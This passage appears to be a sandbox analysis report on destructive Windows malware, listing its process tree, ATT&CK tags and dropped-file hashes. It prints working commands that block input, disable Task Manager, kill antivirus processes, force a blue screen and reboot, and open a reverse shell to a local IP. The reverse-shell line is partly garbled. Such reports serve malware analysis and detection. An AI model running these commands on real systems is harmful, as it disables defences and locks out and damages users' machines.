        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        13⤵
        
        PID:340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:468
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iq4m10gt\iq4m10gt.cmdline"
        12⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        11⤵
        
        PID:2084
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5e5q23rv\5e5q23rv.cmdline"
        12⤵
        
        PID:3392
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB120.tmp" "c:\Users\Admin\AppData\Local\Temp\5e5q23rv\CSCF70212A05A0C4BF0B2FA4D734ADD1520.TMP"
        13⤵
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        11⤵
        
        PID:4980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3336
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hdvhx5ol\hdvhx5ol.cmdline"
        12⤵
        
        PID:1008
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5A4.tmp" "c:\Users\Admin\AppData\Local\Temp\hdvhx5ol\CSC1397283D12A04143849687235247129.TMP"
        13⤵
        
        PID:4800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        11⤵
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4392
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sk4i43gy\sk4i43gy.cmdline"
        10⤵
        
        PID:4692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3196
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5trfgtkj\5trfgtkj.cmdline"
        10⤵
        
        PID:1508
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF5A.tmp" "c:\Users\Admin\AppData\Local\Temp\5trfgtkj\CSCE875C2BBBB594994B153B930799466F0.TMP"
        11⤵
        
        PID:1776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        9⤵
        
        PID:4640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vsmuqlax\vsmuqlax.cmdline"
        10⤵
        
        PID:1064
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB40E.tmp" "c:\Users\Admin\AppData\Local\Temp\vsmuqlax\CSC97445037FBDD4F9BB8CB6C52D1D882C5.TMP"
        11⤵
        
        PID:704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        9⤵
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2476
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\geboqanv\geboqanv.cmdline"
        8⤵
        
        PID:864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        7⤵
        
        PID:4956
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4nn3mlna\4nn3mlna.cmdline"
        8⤵
        
        PID:3328
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8E2.tmp" "c:\Users\Admin\AppData\Local\Temp\4nn3mlna\CSC7C2EBD49800144DDB21EBD3E498AD67.TMP"
        9⤵
        
        PID:4052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:4196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4236
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2d5gpp1\u2d5gpp1.cmdline"
        8⤵
        
        PID:4740
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADD4.tmp" "c:\Users\Admin\AppData\Local\Temp\u2d5gpp1\CSCE7B56BD0223E463080B8F398D9F2F72F.TMP"
        9⤵
        
        PID:3384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        7⤵
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1524
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\akuejxvb\akuejxvb.cmdline"
        6⤵
        
        PID:1372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5080
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v12pjlpb\v12pjlpb.cmdline"
        6⤵
        
        PID:1136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA633.tmp" "c:\Users\Admin\AppData\Local\Temp\v12pjlpb\CSC56FA5E64446E4072B5D9EBB466CA7B6D.TMP"
        7⤵
        
        PID:5116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        5⤵
        
        PID:5008
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k2gtujqu\k2gtujqu.cmdline"
        6⤵
        
        PID:8
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA940.tmp" "c:\Users\Admin\AppData\Local\Temp\k2gtujqu\CSCEEA9786DA7F949A1882127203F5866FB.TMP"
        7⤵
        
        PID:1776
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        5⤵
        
        PID:1872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bcq12m4e\bcq12m4e.cmdline"
      4⤵
      PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sahex1fd\sahex1fd.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4172
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FE9.tmp" "c:\Users\Admin\AppData\Local\Temp\sahex1fd\CSC2E599F75A9C74414A929F6381EEA9DC1.TMP"
        5⤵
        
        PID:3416
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rmnkfelh\rmnkfelh.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3640
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1ED.tmp" "c:\Users\Admin\AppData\Local\Temp\rmnkfelh\CSC273B684340B74520A918278AFED936F4.TMP"
        5⤵
        
        PID:4820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    PID:3992
- - C:\Windows\system32\taskkill.exe
    taskkill /IM MsMpEng.exe /F
    3⤵
    - Kills process with taskkill
    PID:2044
- - C:\Windows\system32\taskkill.exe
    taskkill /IM AvastSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1860
- - C:\Windows\system32\taskkill.exe
    taskkill /IM avgsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:3172
- - C:\Windows\system32\taskkill.exe
    taskkill /IM McAfee.exe /F
    3⤵
    - Kills process with taskkill
    PID:1992
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Norton.exe /F
    3⤵
    - Kills process with taskkill
    PID:3912
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Kaspersky.exe /F
    3⤵
    - Kills process with taskkill
    PID:4824
- - C:\Windows\system32\taskkill.exe
    taskkill /IM BitDefender.exe /F
    3⤵
    - Kills process with taskkill
    PID:1256
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Sophos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1556
- - C:\Windows\system32\taskkill.exe
    taskkill /IM malwarebytes.exe /F
    3⤵
    - Kills process with taskkill
    PID:2856
- - C:\Windows\system32\taskkill.exe
    taskkill /IM CylanceSvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4880
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Panda.exe /F
    3⤵
    - Kills process with taskkill
    PID:1524
- - C:\Windows\system32\taskkill.exe
    taskkill /IM EsetService.exe /F
    3⤵
    - Kills process with taskkill
    PID:4564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
    3⤵
    PID:4796
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fnrpenr0\fnrpenr0.cmdline"
      4⤵
      PID:1312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
    3⤵
    PID:6016
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2f1shfzg\2f1shfzg.cmdline"
      4⤵
      PID:5932
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2040

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3988855 /state1:0x41c64e6d
1⤵
PID:5524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88e89890397444032c9580dc3f4b831a

SHA1
875837b94c3afd9b57b2348e0464d75873da3e57

SHA256
27b08b8be44097428931dfa01c931e3a3309f5ad29b628e11d50a3f996d58d33

SHA512
7f90e2515b70ab55f8311a6982be993a0ee80530d1b1a746be9130202c1d437436281632231d7c2a97ceee4f678d41604e660dc07b47872d761523b76c31a1d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec9cd6ce5420345cea4a58dc725732b8

SHA1
5e34471bf82bb3aa5c98d4f3887af0560d7164d6

SHA256
ac0c4a9f16e4324080bec1be0443d07ae0d47d1ba6791e2e7c51c4402fd3dd8f

SHA512
236aacbedea79abe1a07b28f3f6c145c1d98accc66e9ae13a431b651f319d4952ab8267a99c5e01eb105fa9ffd0f26461b65ca727932867fbaf1ae4198718fa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7355f4a1d4e1a2519a4a60ee11f1d192

SHA1
8802bbb71f3e8947c02a7d835b31c7abf4289780

SHA256
2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3

SHA512
7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a4bd47f3f9127aeb13e176532cbb7bef

SHA1
a6de03fbacb57ebecf88cda2d95003cd5bfe7276

SHA256
0c281fca6f2850a7adfe643d2a0166068a7548d9c2cde3b4744cb4a9d6f0a75d

SHA512
2450330696865af3e1f1b09f9817bb600b6630c37aaa6ed2d4bb883135937afd1fed1f2612d3cb74ff7d52ae986ffc27a5a6cf4a1ca783b77ece80ab8dc26148

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
06749aaa06f6c7945179a4d6987646df

SHA1
e9a085d7066b30cb8b3f252e18a430f2651e641c

SHA256
f2834fd2d110fae3fc504311522554154af4e9a1bdf96b20836983ce04135b7f

SHA512
eba3862fdf9f835398862e511e4acf5f48f4c1f6fa42a96be4012fe968ee2d3b60eb3ee50760d2d0d0c89dfcc1212c5b1dd35fc140069405e39ecba23bb94047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dd3474e6a72c08266c25f196f78b13fd

SHA1
b70c6bbd7794b49b6b9afa6343987a7f553d1268

SHA256
82acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318

SHA512
cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b5b44180f25979cf08848b6da7eef023

SHA1
a578bc270fc1617765acfe23a86cb544d2880f87

SHA256
ac1b2b60e5089d97c2e3aa6ce6273cd54a093b2b11b5e7526f6b1ea0d66a859c

SHA512
3e54c32ff386fb8d70e9f4f94ab35eb9ac2469521a84a4c061cada26aa89fb8fcefaba01667369e6c36b997ff0bb265bf78e2e085e89a9e4d8d2d5e6a792bcf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
49b4d40f2c6ffaec6aeef620d5de70bb

SHA1
527ce9b689b4cb4352d7e1f9b8689b3fb797107c

SHA256
